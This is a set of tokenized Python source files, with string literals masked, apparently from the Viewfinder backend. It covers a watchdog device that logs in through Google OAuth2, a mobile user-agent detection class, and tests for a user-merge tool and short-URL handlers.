name , exc_info = ( typ , val , tb ) ) <EOL> _OnComplete ( ) <EOL> def _RunIteration ( ) : <EOL> with util . Barrier ( _OnComplete , _OnException ) as b : <EOL> self . handler ( device , logger , b . Callback ( ) ) <EOL> _RunIteration ( ) <EOL> def StopLoop ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _timeout is not None : <EOL> IOLoop . current ( ) . remove_timeout ( self . _timeout ) <EOL> class ScenarioDevice ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> self . _svc_url = '<STR_LIT>' % ( ServerEnvironment . GetHost ( ) , options . options . port ) <EOL> self . _user_cookie = None <EOL> if options . options . watchdog_auth_reset : <EOL> self . _ClearAuthentication ( ) <EOL> else : <EOL> self . _LoadAuthentication ( ) <EOL> def SendRequest ( self , service_path , callback , method = '<STR_LIT:POST>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if self . _user_cookie is None : <EOL> raise ScenarioLoginError ( '<STR_LIT>' <EOL> % self . name ) <EOL> http_client = httpclient . AsyncHTTPClient ( ) <EOL> url = self . _GetUrl ( service_path ) <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' % ( self . _user_cookie ) , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> if method == '<STR_LIT:GET>' : <EOL> if len ( kwargs ) > <NUM_LIT:0> : <EOL> url += '<STR_LIT:?>' + urllib . urlencode ( kwargs ) <EOL> http_client . fetch ( url , method = method , callback = callback , validate_cert = False , headers = headers ) <EOL> elif method == '<STR_LIT:POST>' : <EOL> headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT:application/json>' <EOL> request_body = json . dumps ( kwargs ) <EOL> http_client . fetch ( url , method = method , body = request_body , callback = callback , validate_cert = False , <EOL> headers = headers ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % method ) <EOL> def IsAuthenticated ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . 
_user_cookie is not None <EOL> def GetUserCode ( self , callback ) : <EOL> """<STR_LIT>""" <EOL> def _OnGetDeviceCode ( response ) : <EOL> response_dict = www_util . ParseJSONResponse ( response ) <EOL> self . _device_code = response_dict . get ( '<STR_LIT>' ) <EOL> callback ( response_dict . get ( '<STR_LIT>' ) , response_dict . get ( '<STR_LIT>' ) ) <EOL> request_args = { '<STR_LIT>' : secrets . GetSecret ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _GOOGLE_OAUTH2_SCOPES } <EOL> url = _GOOGLE_OAUTH2_DEVICECODE_URL <EOL> http_client = httpclient . AsyncHTTPClient ( ) <EOL> http_client . fetch ( url , method = '<STR_LIT:POST>' , <EOL> body = urllib . urlencode ( request_args ) , callback = _OnGetDeviceCode ) <EOL> def PollForAuthentication ( self , callback ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise ScenarioLoginError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> http_client = httpclient . AsyncHTTPClient ( ) <EOL> def _OnLogin ( response ) : <EOL> if not response . code in ( <NUM_LIT:200> , <NUM_LIT> ) : <EOL> raise ScenarioLoginError ( '<STR_LIT>' % response . error ) <EOL> self . _user_cookie = self . _GetUserCookieFromResponse ( response ) <EOL> self . _SaveAuthentication ( ) <EOL> callback ( True ) <EOL> def _OnPollTokenEndpoint ( response ) : <EOL> json_response = www_util . ParseJSONResponse ( response ) <EOL> if '<STR_LIT:error>' in json_response : <EOL> callback ( False ) <EOL> else : <EOL> refresh_token = json_response . get ( '<STR_LIT>' ) <EOL> url = '<STR_LIT>' % ( ServerEnvironment . GetHost ( ) , options . options . port , refresh_token ) <EOL> http_client . fetch ( url , method = '<STR_LIT:POST>' , <EOL> callback = _OnLogin , <EOL> body = json . dumps ( { } ) , <EOL> validate_cert = False , follow_redirects = False , <EOL> headers = { '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' } ) <EOL> url = _GOOGLE_OAUTH2_TOKEN_URL <EOL> request_args = { '<STR_LIT>' : secrets . 
GetSecret ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : secrets . GetSecret ( '<STR_LIT>' ) , <EOL> '<STR_LIT:code>' : self . _device_code , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> http_client . fetch ( url , method = '<STR_LIT:POST>' , <EOL> body = urllib . urlencode ( request_args ) , <EOL> callback = _OnPollTokenEndpoint ) <EOL> def _GetUserCookieFromResponse ( self , response ) : <EOL> """<STR_LIT>""" <EOL> user_cookie_header = [ h for h in response . headers . get_list ( '<STR_LIT>' ) if h . startswith ( '<STR_LIT>' ) ] [ - <NUM_LIT:1> ] <EOL> return re . match ( r'<STR_LIT>' , user_cookie_header ) . group ( <NUM_LIT:1> ) <EOL> def _LoadAuthentication ( self ) : <EOL> """<STR_LIT>""" <EOL> auth_file = self . _AuthFilePath ( ) <EOL> if os . path . exists ( auth_file ) : <EOL> try : <EOL> fh = open ( auth_file , '<STR_LIT:r>' ) <EOL> self . _user_cookie = fh . read ( ) <EOL> except : <EOL> logging . fatal ( '<STR_LIT>' , auth_file , exc_info = True ) <EOL> raise ScenarioLoginError ( '<STR_LIT>' % self . name ) <EOL> def _SaveAuthentication ( self ) : <EOL> """<STR_LIT>""" <EOL> auth_file = self . _AuthFilePath ( ) <EOL> try : <EOL> dir = os . path . dirname ( auth_file ) <EOL> if not os . path . exists ( dir ) : <EOL> os . makedirs ( dir ) <EOL> fh = open ( auth_file , '<STR_LIT:w>' ) <EOL> fh . write ( self . _user_cookie ) <EOL> fh . close ( ) <EOL> except : <EOL> logging . fatal ( '<STR_LIT>' , auth_file , exc_info = True ) <EOL> raise ScenarioLoginError ( '<STR_LIT>' % self . name ) <EOL> def _ClearAuthentication ( self ) : <EOL> """<STR_LIT>""" <EOL> auth_file = self . _AuthFilePath ( ) <EOL> if os . path . exists ( auth_file ) : <EOL> try : <EOL> os . remove ( auth_file ) <EOL> except : <EOL> logging . fatal ( '<STR_LIT>' , auth_file , exc_info = True ) <EOL> raise ScenarioLoginError ( '<STR_LIT>' % self . name ) <EOL> def _AuthFilePath ( self ) : <EOL> return os . path . join ( options . options . watchdog_auth_dir , self . 
name ) <EOL> def _GetUrl ( self , path ) : <EOL> return self . _svc_url + path </s>
<s> class UAgentInfo ( object ) : <EOL> """<STR_LIT>""" <EOL> engineWebKit = "<STR_LIT>" <EOL> deviceIphone = "<STR_LIT>" <EOL> deviceIpod = "<STR_LIT>" <EOL> deviceIpad = "<STR_LIT>" <EOL> deviceMacPpc = "<STR_LIT>" <EOL> deviceAndroid = "<STR_LIT>" <EOL> deviceGoogleTV = "<STR_LIT>" <EOL> deviceXoom = "<STR_LIT>" <EOL> deviceHtcFlyer = "<STR_LIT>" <EOL> deviceSymbian = "<STR_LIT>" <EOL> deviceS60 = "<STR_LIT>" <EOL> deviceS70 = "<STR_LIT>" <EOL> deviceS80 = "<STR_LIT>" <EOL> deviceS90 = "<STR_LIT>" <EOL> deviceWinPhone7 = "<STR_LIT>" <EOL> deviceWinMob = "<STR_LIT>" <EOL> deviceWindows = "<STR_LIT>" <EOL> deviceIeMob = "<STR_LIT>" <EOL> devicePpc = "<STR_LIT>" <EOL> enginePie = "<STR_LIT>" <EOL> deviceBB = "<STR_LIT>" <EOL> vndRIM = "<STR_LIT>" <EOL> deviceBBStorm = "<STR_LIT>" <EOL> deviceBBBold = "<STR_LIT>" <EOL> deviceBBBoldTouch = "<STR_LIT>" <EOL> deviceBBTour = "<STR_LIT>" <EOL> deviceBBCurve = "<STR_LIT>" <EOL> deviceBBCurveTouch = "<STR_LIT>" <EOL> deviceBBTorch = "<STR_LIT>" <EOL> deviceBBPlaybook = "<STR_LIT>" <EOL> devicePalm = "<STR_LIT>" <EOL> deviceWebOS = "<STR_LIT>" <EOL> deviceWebOShp = "<STR_LIT>" <EOL> engineBlazer = "<STR_LIT>" <EOL> engineXiino = "<STR_LIT>" <EOL> deviceKindle = "<STR_LIT>" <EOL> engineSilk = "<STR_LIT>" <EOL> deviceNuvifone = "<STR_LIT>" <EOL> vndwap = "<STR_LIT>" <EOL> wml = "<STR_LIT>" <EOL> deviceTablet = "<STR_LIT>" <EOL> deviceBrew = "<STR_LIT>" <EOL> deviceDanger = "<STR_LIT>" <EOL> deviceHiptop = "<STR_LIT>" <EOL> devicePlaystation = "<STR_LIT>" <EOL> deviceNintendoDs = "<STR_LIT>" <EOL> deviceNintendo = "<STR_LIT>" <EOL> deviceWii = "<STR_LIT>" <EOL> deviceXbox = "<STR_LIT>" <EOL> deviceArchos = "<STR_LIT>" <EOL> engineOpera = "<STR_LIT>" <EOL> engineNetfront = "<STR_LIT>" <EOL> engineUpBrowser = "<STR_LIT>" <EOL> engineOpenWeb = "<STR_LIT>" <EOL> deviceMidp = "<STR_LIT>" <EOL> uplink = "<STR_LIT>" <EOL> engineTelecaQ = "<STR_LIT>" <EOL> devicePda = "<STR_LIT>" <EOL> mini = "<STR_LIT>" <EOL> mobile = "<STR_LIT>" 
<EOL> mobi = "<STR_LIT>" <EOL> maemo = "<STR_LIT>" <EOL> linux = "<STR_LIT>" <EOL> qtembedded = "<STR_LIT>" <EOL> mylocom2 = "<STR_LIT>" <EOL> manuSonyEricsson = "<STR_LIT>" <EOL> manuericsson = "<STR_LIT>" <EOL> manuSamsung1 = "<STR_LIT>" <EOL> manuSony = "<STR_LIT>" <EOL> manuHtc = "<STR_LIT>" <EOL> svcDocomo = "<STR_LIT>" <EOL> svcKddi = "<STR_LIT>" <EOL> svcVodafone = "<STR_LIT>" <EOL> disUpdate = "<STR_LIT>" <EOL> def __init__ ( self , userAgent , httpAccept ) : <EOL> """<STR_LIT>""" <EOL> self . __userAgent = userAgent . lower ( ) if userAgent else "<STR_LIT>" <EOL> self . __httpAccept = httpAccept . lower ( ) if httpAccept else "<STR_LIT>" <EOL> self . __isIphone = False <EOL> self . __isAndroidPhone = False <EOL> self . __isTierTablet = False <EOL> self . __isTierIphone = False <EOL> self . __isTierRichCss = False <EOL> self . __isTierGenericMobile = False <EOL> self . initDeviceScan ( ) <EOL> def getUserAgent ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __userAgent <EOL> def getHttpAccept ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __httpAccept <EOL> def getIsIphone ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __isIphone <EOL> def getIsTierTablet ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __isTierTablet <EOL> def getIsTierIphone ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __isTierIphone <EOL> def getIsTierRichCss ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __isTierRichCss <EOL> def getIsTierGenericMobile ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __isTierGenericMobile <EOL> def initDeviceScan ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __isIphone = self . detectIphoneOrIpod ( ) <EOL> self . __isAndroidPhone = self . detectAndroidPhone ( ) <EOL> self . __isTierTablet = self . detectTierTablet ( ) <EOL> self . __isTierIphone = self . detectTierIphone ( ) <EOL> self . __isTierRichCss = self . detectTierRichCss ( ) <EOL> self . __isTierGenericMobile = self . 
detectTierOtherPhones ( ) <EOL> def detectIphone ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceIphone in self . __userAgent and not self . detectIpad ( ) and not self . detectIpod ( ) <EOL> def detectIpod ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceIpod in self . __userAgent <EOL> def detectIpad ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceIpad in self . __userAgent and self . detectWebkit ( ) <EOL> def detectIphoneOrIpod ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceIphone in self . __userAgent or UAgentInfo . deviceIpod in self . __userAgent <EOL> def detectIos ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . detectIphoneOrIpod ( ) or self . detectIpad ( ) <EOL> def detectAndroid ( self ) : <EOL> """<STR_LIT>""" <EOL> if UAgentInfo . deviceAndroid in self . __userAgent or self . detectGoogleTV ( ) : <EOL> return True <EOL> return UAgentInfo . deviceHtcFlyer in self . __userAgent <EOL> def detectAndroidPhone ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . detectAndroid ( ) and UAgentInfo . mobile in self . __userAgent : <EOL> return True <EOL> if self . detectOperaAndroidPhone ( ) : <EOL> return True <EOL> return UAgentInfo . deviceHtcFlyer in self . __userAgent <EOL> def detectAndroidTablet ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . detectAndroid ( ) : <EOL> return False <EOL> if self . detectOperaMobile ( ) : <EOL> return False <EOL> if UAgentInfo . deviceHtcFlyer in self . __userAgent : <EOL> return False <EOL> return UAgentInfo . mobile not in self . __userAgent <EOL> def detectAndroidWebKit ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . detectAndroid ( ) and self . detectWebkit ( ) <EOL> def detectGoogleTV ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceGoogleTV in self . __userAgent <EOL> def detectWebkit ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . engineWebKit in self . 
__userAgent <EOL> def detectS60OssBrowser ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . detectWebkit ( ) and ( UAgentInfo . deviceSymbian in self . __userAgent or UAgentInfo . deviceS60 in self . __userAgent ) <EOL> def detectSymbianOS ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceSymbian in self . __userAgent or UAgentInfo . deviceS60 in self . __userAgent or UAgentInfo . deviceS70 in self . __userAgent or UAgentInfo . deviceS80 in self . __userAgent or UAgentInfo . deviceS90 in self . __userAgent <EOL> def detectWindowsPhone7 ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceWinPhone7 in self . __userAgent <EOL> def detectWindowsMobile ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . detectWindowsPhone7 ( ) : <EOL> return False <EOL> if UAgentInfo . deviceWinMob in self . __userAgent or UAgentInfo . deviceIeMob in self . __userAgent or UAgentInfo . enginePie in self . __userAgent : <EOL> return True <EOL> if UAgentInfo . manuHtc in self . __userAgent and UAgentInfo . deviceWindows in self . __userAgent : <EOL> return True <EOL> if self . detectWapWml ( ) and UAgentInfo . deviceWindows in self . __userAgent : <EOL> return True <EOL> return UAgentInfo . devicePpc in self . __userAgent and UAgentInfo . deviceMacPpc not in self . __userAgent <EOL> def detectBlackBerry ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceBB in self . __userAgent or UAgentInfo . vndRIM in self . __httpAccept <EOL> def detectBlackBerryTablet ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceBBPlaybook in self . __userAgent <EOL> def detectBlackBerryWebKit ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . detectBlackBerry ( ) and self . detectWebkit ( ) <EOL> def detectBlackBerryTouch ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceBBStorm in self . __userAgent or UAgentInfo . deviceBBTorch in self . __userAgent or UAgentInfo . deviceBBBoldTouch in self . __userAgent or UAgentInfo . 
deviceBBCurveTouch in self . __userAgent <EOL> def detectBlackBerryHigh ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . detectBlackBerryWebKit ( ) : <EOL> return False <EOL> if not self . detectBlackBerry ( ) : <EOL> return False <EOL> return self . detectBlackBerryTouch ( ) or UAgentInfo . deviceBBBold in self . __userAgent or UAgentInfo . deviceBBTour in self . __userAgent or UAgentInfo . deviceBBCurve in self . __userAgent <EOL> def detectBlackBerryLow ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . detectBlackBerry ( ) : <EOL> return False <EOL> return self . detectBlackBerryHigh ( ) or self . detectBlackBerryWebKit ( ) <EOL> def detectPalmOS ( self ) : <EOL> """<STR_LIT>""" <EOL> if UAgentInfo . devicePalm in self . __userAgent or UAgentInfo . engineBlazer in self . __userAgent or UAgentInfo . engineXiino in self . __userAgent : <EOL> return not self . detectPalmWebOS ( ) <EOL> return False <EOL> def detectPalmWebOS ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceWebOS in self . __userAgent <EOL> def detectWebOSTablet ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceWebOShp in self . __userAgent and UAgentInfo . deviceTablet in self . __userAgent <EOL> def detectGarminNuvifone ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceNuvifone in self . __userAgent <EOL> def detectSmartphone ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __isIphone or self . __isAndroidPhone or self . __isTierIphone or self . detectS60OssBrowser ( ) or self . detectSymbianOS ( ) or self . detectWindowsMobile ( ) or self . detectWindowsPhone7 ( ) or self . detectBlackBerry ( ) or self . detectPalmWebOS ( ) or self . detectPalmOS ( ) or self . detectGarminNuvifone ( ) <EOL> def detectBrewDevice ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceBrew in self . __userAgent <EOL> def detectDangerHiptop ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceDanger in self . __userAgent or UAgentInfo . 
deviceHiptop in self . __userAgent <EOL> def detectOperaMobile ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . engineOpera in self . __userAgent and ( UAgentInfo . mini in self . __userAgent or UAgentInfo . mobi in self . __userAgent ) <EOL> def detectOperaAndroidPhone ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . engineOpera in self . __userAgent and UAgentInfo . deviceAndroid in self . __userAgent and UAgentInfo . mobi in self . __userAgent <EOL> def detectOperaAndroidTablet ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . engineOpera in self . __userAgent and UAgentInfo . deviceAndroid in self . __userAgent and UAgentInfo . deviceTablet in self . __userAgent <EOL> def detectWapWml ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . vndwap in self . __httpAccept or UAgentInfo . wml in self . __httpAccept <EOL> def detectKindle ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceKindle in self . __userAgent and not self . detectAndroid ( ) <EOL> def detectAmazonSilk ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . engineSilk in self . __userAgent <EOL> def detectMobileQuick ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . __isTierTablet : <EOL> return False <EOL> if self . detectSmartphone ( ) : <EOL> return True <EOL> if self . detectWapWml ( ) or self . detectBrewDevice ( ) or self . detectOperaMobile ( ) : <EOL> return True <EOL> if UAgentInfo . engineNetfront in self . __userAgent or UAgentInfo . engineUpBrowser in self . __userAgent or UAgentInfo . engineOpenWeb in self . __userAgent : <EOL> return True <EOL> if self . detectDangerHiptop ( ) or self . detectMidpCapable ( ) or self . detectMaemoTablet ( ) or self . detectArchos ( ) : <EOL> return True <EOL> if UAgentInfo . devicePda in self . __userAgent and UAgentInfo . disUpdate not in self . __userAgent : <EOL> return True <EOL> if UAgentInfo . mobile in self . __userAgent : <EOL> return True <EOL> if self . detectKindle ( ) or self . 
detectAmazonSilk ( ) : <EOL> return True <EOL> return False <EOL> def detectSonyPlaystation ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . devicePlaystation in self . __userAgent <EOL> def detectNintendo ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceNintendo in self . __userAgent or UAgentInfo . deviceNintendo in self . __userAgent or UAgentInfo . deviceNintendo in self . __userAgent <EOL> def detectXbox ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceXbox in self . __userAgent <EOL> def detectGameConsole ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . detectSonyPlaystation ( ) or self . detectNintendo ( ) or self . detectXbox ( ) <EOL> def detectMidpCapable ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceMidp in self . __userAgent or UAgentInfo . deviceMidp in self . __httpAccept <EOL> def detectMaemoTablet ( self ) : <EOL> """<STR_LIT>""" <EOL> if UAgentInfo . maemo in self . __userAgent : <EOL> return True <EOL> return UAgentInfo . linux in self . __userAgent and UAgentInfo . deviceTablet in self . __userAgent and not self . detectWebOSTablet ( ) and not self . detectAndroid ( ) <EOL> def detectArchos ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceArchos in self . __userAgent <EOL> def detectSonyMylo ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . manuSony in self . __userAgent and ( UAgentInfo . qtembedded in self . __userAgent <EOL> or UAgentInfo . mylocom2 in self . __userAgent ) <EOL> def detectMobileLong ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . detectMobileQuick ( ) or self . detectGameConsole ( ) or self . detectSonyMylo ( ) : <EOL> return True <EOL> return UAgentInfo . uplink in self . __userAgent or UAgentInfo . manuSonyEricsson in self . __userAgent or UAgentInfo . manuericsson in self . __userAgent or UAgentInfo . manuSamsung1 in self . __userAgent or UAgentInfo . svcDocomo in self . __userAgent or UAgentInfo . svcKddi in self . 
__userAgent or UAgentInfo . svcVodafone in self . __userAgent <EOL> def detectTierTablet ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . detectIpad ( ) or self . detectAndroidTablet ( ) or self . detectBlackBerryTablet ( ) or self . detectWebOSTablet ( ) <EOL> def detectTierIphone ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __isIphone or self . __isAndroidPhone or self . detectBlackBerryWebKit ( ) and self . detectBlackBerryTouch ( ) or self . detectWindowsPhone7 ( ) or self . detectPalmWebOS ( ) or self . detectGarminNuvifone ( ) <EOL> def detectTierRichCss ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . detectMobileQuick ( ) : <EOL> return False <EOL> if self . detectTierIphone ( ) or self . detectKindle ( ) : <EOL> return False <EOL> return self . detectWebkit ( ) or self . detectS60OssBrowser ( ) or self . detectBlackBerryHigh ( ) or self . detectWindowsMobile ( ) or UAgentInfo . engineTelecaQ in self . __userAgent <EOL> def detectTierOtherPhones ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . detectMobileLong ( ) and not self . detectTierIphone ( ) and not self . detectTierRichCss ( ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from tornado import options <EOL> from viewfinder . backend . www . test import service_base_test <EOL> from viewfinder . backend . www . tools import merge_tool <EOL> class MergeToolTestCase ( service_base_test . ServiceBaseTestCase ) : <EOL> """<STR_LIT>""" <EOL> def testMerge ( self ) : <EOL> self . _validate = False <EOL> self . _RunAsync ( merge_tool . Merge , <EOL> self . _client , <EOL> target_user_id = self . _user . user_id , <EOL> source_user_id = self . _user2 . user_id , <EOL> base_url = self . get_url ( '<STR_LIT>' ) , <EOL> no_prompt = True ) <EOL> actual_dict = self . _tester . SendRequest ( '<STR_LIT>' , self . _cookie , { } ) <EOL> self . assertEqual ( len ( actual_dict [ '<STR_LIT>' ] ) , <NUM_LIT:2> ) </s>
<s> """<STR_LIT>""" <EOL> __authors__ = [ '<STR_LIT>' ] <EOL> import json <EOL> import mock <EOL> from tornado import options <EOL> from viewfinder . backend . base import constants , util <EOL> from viewfinder . backend . base . exceptions import TooManyRetriesError <EOL> from viewfinder . backend . base . testing import async_test <EOL> from viewfinder . backend . db . guess import Guess <EOL> from viewfinder . backend . db . short_url import ShortURL <EOL> from viewfinder . backend . www import base <EOL> from viewfinder . backend . www . short_url_base import ShortURLBaseHandler <EOL> from viewfinder . backend . www . test import service_base_test <EOL> class TestShortURLBaseHandler ( ShortURLBaseHandler , base . BaseHandler ) : <EOL> """<STR_LIT>""" <EOL> _MAX_GUESSES = <NUM_LIT:50> <EOL> def _HandleGet ( self , short_url , arg1 , arg2 ) : <EOL> self . write ( { '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT>' : short_url . group_id , <EOL> '<STR_LIT>' : short_url . random_key , <EOL> '<STR_LIT>' : short_url . timestamp , <EOL> '<STR_LIT>' : short_url . expires , <EOL> '<STR_LIT>' : arg1 , <EOL> '<STR_LIT>' : arg2 } ) <EOL> self . finish ( ) <EOL> def _HandlePost ( self , short_url , arg1 , arg2 ) : <EOL> self . write ( { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : short_url . group_id , <EOL> '<STR_LIT>' : short_url . random_key , <EOL> '<STR_LIT>' : short_url . timestamp , <EOL> '<STR_LIT>' : short_url . expires , <EOL> '<STR_LIT>' : arg1 , <EOL> '<STR_LIT>' : arg2 } ) <EOL> self . finish ( ) <EOL> class ShortURLTestCase ( service_base_test . ServiceBaseTestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( ShortURLTestCase , self ) . setUp ( ) <EOL> self . _app . add_handlers ( r'<STR_LIT>' , [ ( r'<STR_LIT>' , TestShortURLBaseHandler ) ] ) <EOL> self . _short_url = self . _RunAsync ( ShortURL . Create , <EOL> self . _client , <EOL> group_id = '<STR_LIT>' , <EOL> timestamp = util . _TEST_TIME , <EOL> expires = util . 
_TEST_TIME + constants . SECONDS_PER_DAY , <EOL> arg1 = <NUM_LIT:1> , <EOL> arg2 = '<STR_LIT:foo>' ) <EOL> self . _url = self . get_url ( '<STR_LIT>' % ( self . _short_url . group_id , self . _short_url . random_key ) ) <EOL> def testShortURLGet ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _RunAsync ( self . http_client . fetch , self . _url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( response . body ) , { '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . _short_url . random_key , <EOL> '<STR_LIT>' : util . _TEST_TIME , <EOL> '<STR_LIT>' : util . _TEST_TIME + constants . SECONDS_PER_DAY , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> def testShortURLPost ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _RunAsync ( self . http_client . fetch , <EOL> self . _url , <EOL> method = '<STR_LIT:POST>' , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> body = '<STR_LIT:{}>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( response . body ) , { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . _short_url . random_key , <EOL> '<STR_LIT>' : util . _TEST_TIME , <EOL> '<STR_LIT>' : util . _TEST_TIME + constants . SECONDS_PER_DAY , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> @ mock . patch . object ( TestShortURLBaseHandler , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> def testMaxGuesses ( self ) : <EOL> """<STR_LIT>""" <EOL> url = self . get_url ( '<STR_LIT>' ) <EOL> response = self . _RunAsync ( self . http_client . fetch , url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> response = self . _RunAsync ( self . http_client . fetch , url , method = '<STR_LIT:GET>' ) <EOL> self . 
assertEqual ( response . code , <NUM_LIT> ) <EOL> response = self . _RunAsync ( self . http_client . fetch , self . _url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> url = self . get_url ( '<STR_LIT>' ) <EOL> response = self . _RunAsync ( self . http_client . fetch , url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> util . _TEST_TIME += constants . SECONDS_PER_DAY <EOL> response = self . _RunAsync ( self . http_client . fetch , url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> def testExpire ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _RunAsync ( self . _short_url . Expire , self . _client ) <EOL> response = self . _RunAsync ( self . http_client . fetch , self . _url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> def testShortURLErrors ( self ) : <EOL> """<STR_LIT>""" <EOL> url = self . get_url ( '<STR_LIT>' ) <EOL> response = self . _RunAsync ( self . http_client . fetch , url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> url = self . get_url ( '<STR_LIT>' ) <EOL> response = self . _RunAsync ( self . http_client . fetch , url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> util . _TEST_TIME += constants . SECONDS_PER_DAY <EOL> response = self . _RunAsync ( self . http_client . fetch , self . _url , method = '<STR_LIT:GET>' ) <EOL> self . assertEqual ( response . code , <NUM_LIT> ) <EOL> with mock . patch . object ( ShortURL , '<STR_LIT>' , <NUM_LIT:0> ) : <EOL> self . assertRaises ( TooManyRetriesError , <EOL> self . _RunAsync , <EOL> ShortURL . Create , <EOL> self . _client , <EOL> group_id = '<STR_LIT>' , <EOL> timestamp = util . _TEST_TIME , <EOL> expires = util . _TEST_TIME + constants . 
